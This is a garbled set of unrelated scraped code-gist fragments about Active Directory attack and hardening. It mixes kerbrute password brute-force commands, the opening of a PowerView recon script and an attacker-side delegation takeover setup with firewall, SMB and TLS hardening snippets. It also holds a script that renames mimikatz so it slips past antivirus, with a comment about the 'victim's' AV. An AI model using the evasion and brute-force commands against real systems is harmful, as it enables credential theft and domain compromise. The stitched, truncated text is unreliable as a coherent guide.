With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# Enable Windows Firewall | |
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True | |
# SMB # require elevated privileges # | |
## Turn on SMB signing and encryption | |
Set-SmbServerConfiguration -RequireSecuritySignature $True -EnableSecuritySignature $True -EncryptData $True -Confirm:$false -Verbose | |
## Turn off the default workstations shares | |
Set-SmbServerConfiguration -AutoShareWorkstation $False -Confirm:$false -Verbose |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/candycrush | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
@Library('ci-jenkins-common') _ | |
// Jenkins build pipeline (declarative) | |
// Project: Seatbelt | |
// URL: https://github.com/GhostPack/Seatbelt | |
// Author: @tifkin_/@harmj0y | |
// Pipeline Author: harmj0y | |
def gitURL = "https://github.com/GhostPack/Seatbelt" |
# | |
# Name: nginx-tls.conf | |
# Auth: Gavin Lloyd <gavinhungry@gmail.com> | |
# Desc: Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating | |
# | |
# Enables HTTP/2, PFS, HSTS and OCSP stapling. Configuration options not related | |
# to SSL/TLS are not included here. | |
# | |
# Additional tips: | |
# |
# Copyright 2019, Alexander Hass | |
# https://www.hass.de/content/setup-microsoft-windows-or-iis-ssl-perfect-forward-secrecy-and-tls-12 | |
# | |
# After running this script the computer only supports: | |
# - TLS 1.2 | |
# | |
# Version 3.0.1, see CHANGELOG.txt for changes. | |
Write-Host 'Configuring IIS with SSL/TLS Deployment Best Practices...' | |
Write-Host '--------------------------------------------------------------------------------' |